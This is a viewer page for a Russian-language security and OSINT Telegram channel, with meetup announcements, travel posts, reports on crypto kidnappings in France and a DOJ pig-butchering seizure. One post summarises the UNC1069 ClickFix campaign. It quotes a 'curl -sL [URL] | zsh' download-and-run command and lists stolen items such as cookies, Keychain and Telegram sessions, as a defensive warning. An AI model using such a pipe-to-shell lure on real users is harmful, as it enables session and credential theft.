TGViewer
Channel Public Channel
сelestial intelligence lab

сelestial intelligence lab

@web3osinter

building cool things with cool people🕵️‍♂️
@celestial3301
Subscribers
1.06K
Photos
87
Videos
4
Links
52

Showing posts older than #76 · Back to latest

Older Posts 16 shown
Post #75 7.26K
Хей-хей 👋

🔥 В апреле снова собираемся.
2600 жив, и в этот раз будет ещё плотнее 🔥

🔈 Готовимся к новой встрече хакеров, исследователей и просто тех, кто хочет попить бесплатного пива под умные разговоры.

🎤 Вас ждут 3 доклада:

📎 Crypto Scam Storytelling: Address Poisoning
От: @Pr1tchard
— как работает address poisoning и почему это больше, чем просто спам в истории транзакций
— какие схемы используют мошенники, чтобы подменять адреса и вводить жертву в заблуждение
— реальные кейсы краж: от нескольких тысяч долларов до миллионов, включая атаки даже на хакеров высокого уровня

📎 Don’t Trust AI Code: Beautiful Code, Ugly Consequences

• почему AI-generated code часто приносит с собой уязвимости прямо из коробки
• почему нас уже накрывает волной AI-generated garbage

📎 Illusion of Security: почему «защищённый периметр» — это иллюзия
От: @hcstm
— действительно ли firewall, VPN и WAF делают инфраструктуру безопасной
— почему защита периметра не спасает, если внутренняя сеть не контролируется
— к чему приводит избыточное доверие между хостами
— что происходит после проникновения внутрь: lateral movement без ограничений

🍕 После выступлений спикеров — афтепати в хакерспейсе

🔥 Что будет:
— неформальные обсуждения и нетворкинг
— пицца 🍕
— общение со спикерами и резидентами хакерспейса
— возможность остаться, обсудить идеи, проекты и просто хорошо провести вечер

📍 Дата и место проведения:
3 апреля в 18:00
[место будет объявлено позже]

P.S. Like, Share, Hack! ✨
  • ❤ 11
  • 👍 4
  • 🔥 3
  • ⚡ 2
Post #74 693
🌷Гёрлз, с 8 марта вас!

В информационной безопасности девушек пока не так много, но каждая из вас - на вес золота 💅🏻


Не важно, чем вы занимаетесь: работаете в SOC, проводите OSINT-расследования, расследуете инциденты, пишете эксплойты, ломаете CTF-таски или защищаете инфраструктуру - вы делаете ИБ сильнее и интереснее.

Спасибо за ваш ум, упорство и профессионализм.

Поменьше ложных срабатываний и побольше раскрытых инцидентов, найденных багов и первых мест на CTF 🏆💻
  • ❤ 10
  • ❤‍🔥 2
Post #73 5.45K
2600 в Алматы!

💀 2600 — ежемесячные слёты айтишников, ИБшников, инженеров и разработчиков. По традиции встречи проходят каждую первую пятницу месяца, с пяти до семи вечера.

📎 Открыт набор докладов — если хотите выступить, предлагайте темы.
Доклады / CFP пишите в ЛС: @celestial3301

В апреле встреча пройдёт 3 апреля.
Формат тот же — максимум 3 доклада, поэтому темы лучше присылать заранее.

📍 Место объявим позже, но формат остаётся прежним — встречаемся в баре. Желающие гости бара смогут влиться и послушать.

Let’s hack and share! 🔥
  • ❤ 6
  • 👍 2
  • 🔥 2
Post #69 636
Какая же была крутая поездка в Грузию 🇬🇪
Столько разговоров, идей и просто приятных людей вокруг.

Отдельное спасибо @osint_mindset. Без преувеличения, но в какой-то момент именно через вас я вообще глубже зашел в OSINT. И это реально поменяло мой путь.

Иногда понимаешь, что жизнь становится намного интереснее, когда вокруг люди, которые тоже постоянно что-то изучают, копают и развиваются.

Такие поездки напоминают, что надо просто продолжать развиваться и делать то, что тебе интересно.

Кстати, тут познакомился с @CuriV - очень заряженный пентестер.
Конечно же позвали его на KazHackStan.
Надеюсь, скоро снова увидимся
  • ❤ 16
  • 👍 2
  • 🔥 2
Post #68 530

Forwarded from Soxoj

На полке обнаружен Димаш
  • 🤣 8
  • 😱 5
  • 🔥 2
  • 😴 1
Post #67 641
✈️ Аэропорт. Везу конину. Национальная миссия.

Стою такой с пакетом, думаю - щас уточню у женщин (грузинок), можно ли конину привезти.

Подхожу.

— Девушки, подскажите, конину можно провозить?

Они на меня смотрят секунд 5.

И такие:

— Бро… мы веганы. Ты вообще не туда 😭

Из всех людей, извсего терминала
Попал ровно в веганское комьюнити

Мораль:
OSINT иногда не работает в реальной жизни.
Надо было сначала собрать данные о таргете
  • 🤣 15
  • 🔥 2
  • 🤝 1
Post #66 545
Всем привет!

Едем в Тбилиси на митап - OSINT Mindset будет в крутом составе 🔥
Если вы рядом или давно хотели познакомиться - это отличный повод

До встречи в Грузии 🇬🇪
  • ❤ 11
  • 🌚 2
Post #65 531

Forwarded from OSINT mindset

გამარჯობა საქართველო! Приближается OSINT mindset meetup geo #1 и мы готовы представить наших спикеров!

Soxoj — Введение в OSINT

Константин Яковлев — Фактчекинг на полную катушку: опыт (очень) большой редакции

CuriV — Техническая разведка глазами пентестера

Ждём всех 28 февраля, в 14:00 (UTC+4), по адресу г. Тбилиси, ул. Мераба Алексидзе, 1, в Sandbox Hackerspace. Мероприятие полностью бесплатное, без регистрации и возрастного ограничения ✨

🌐Site | 💬 Forum | 🔍 Family |▶YT
Post #64 485

Forwarded from ZeroNights

🟩Следующий ZeroNights — 30 сентября!🟩

В 2026 году встретимся на конференции по практической безопасности в Санкт-Петербурге в пространстве LOFT #7.

Надеемся на теплую осень и готовим насыщенную программу: ванильный раф на альтернативном молоке и думать о баг-баунти доклады и воркшопы, таски и CTF, нетворкинг и спикер-пати 🩷

В скором времени мы запустим CFP, а пока предлагаем вам рассмотреть возможность стать коммерческими партнерами конференции. Отправить заявку можно через форму на главной странице сайта.
Или напишите нам на почту: partner@zeronights.ru

➡️ Встретимся на ZeroNights 2026!
  • ❤ 6
Post #63 455
надо будет в этом году податься)
  • 🔥 7
Post #62 514
Это те преступления, при которых во Франции похищали криптовалюту с применением физического насилия за 2025-2026
  • ❤ 6
  • 🤯 2
  • 🍌 1
Post #61 480
Ладно, если не говорить о прошлом, а о нынешних трендах, то во Франции сейчас происходит что-то очень неприятное.

CEO Binance France Давид Пренсэ стал целью вчерашнего нападения. Около семи утра трое в масках ворвались в жилой дом, сначала ошиблись квартирой - искали именно его. Когда добрались до нужной двери, его и семьи дома не оказалось. Забрали два телефона и скрылись. Он и близкие не пострадали. Но сам факт показательный.

И это не единичный случай.

В январе 2025-го похитили Давида Баллана, сооснователя Ledger. Из собственного дома во Франции. Требовали €10 млн в крипте. Чтобы ускорить выплату, ему отрезали палец. История закончилась спасением после частичного перевода выкупа, но сам сигнал был максимально жёсткий.

Во Франции сейчас реально пиздец творится вокруг крипто-индустрии.
Это wrench attack в чистом виде когда вместо эксплойта используют физическое насилие.

Мы много говорим про OPSEC, про cold storage, про multisig, про разделение ролей, про air-gapped устройства. Но вся эта архитектура ломается, когда к тебе приходят домой. И это новая реальность для публичных фигур в крипте
  • ❤ 6
  • 😈 2
Post #57 344
Если всё это собрать в граф - получается вот такая картина.
И это ещё без мелких связей.

Кошельки уже кластеризированы - то есть объединены там, где есть признаки общего контроля.

И если честно, то масштаб э поражает.
Поэтому я впечатлён объёмом проделанной работы DOJ.

Я помню свой первый ончейн-трейсинг: тогда каждая транзакция казалась лабиринтом. Понять логику движения средств, увидеть связи, не утонуть в деталях - это было крайне сложно.

А когда смотришь на такие расследования, кажется, будто это всего лишь линии и точки на графе)
  • ❤ 8
Post #56 364
Речь про тот самый кейс, где DOJ изъяли 127 тысяч BTC, связанные с pig butchering схемами. Огромные суммы, десятки тысяч транзакций и целая сеть компаний вокруг. Но самое интересное не в цифрах, а в том, как это всё было устроено.

DOJ по сути разобрали не просто набор кошельков, а теневую финансовую систему. Когда смотришь на структуру Prince Group, это больше похоже на банковскую инфраструктуру, чем на скам-кошелёк. Mining-операции работали как отмывка ликвидности, Huione OTC были рельсами для движения средств, а Prince Bank выступал как точка выхода в фиат.

Pig butchering давно уже не «скам из телеги». Это индустрия. С траффикингом людей, колл-центрами, CRM, KPI и нормальной финансовой логистикой через ончейн. Деньги дробятся, гоняются по адресам, проходят через прокладки.

Я сел писать об этом после статьи Elliptic “Park: Prince and Huione’s role in a scam compound still operating amid crackdowns”. Она хорошо показывает, как такие структуры продолжают работать даже на фоне давления и арестов.

И на фоне этих миллиардов особенно тяжело смотреть недавнее интервью в Казахстане. Парень просто искал хорошо оплачиваемую работу и в итоге оказался в трудовом рабстве в Мьянме в составе scam compound. За всеми этими графами и миллиардами всегда стоят реальные люди.
X (formerly Twitter) Arkham (@arkham) on X BREAKING: US Government Seized $14B BTC Tied to LuBian and Chen Zhi’s Pig Butchering Operation The US Government has submitted today a filing for the forfeiture of 127,271 $BTC ($14.2 BILLION) connected to Chen Zhi, chairman of Prince Group, who allegedly…
  • ❤ 5
  • 🔥 2
Post #55 418
UNC1069: Deepfake-театр и терминальные эксплойты

Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.

Вся схема заточена под вектор ClickFix.

Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.

Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.

После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.

Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.


Более подробно об этой APT можно прочитать здесь:

https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
Google Cloud Blog UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering | Google Cloud Blog North Korean threat actors target the cryptocurrency industry using AI-enabled social engineering such as deepfakes, and ClickFix.
  • ❤ 5
  • 🤯 2
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →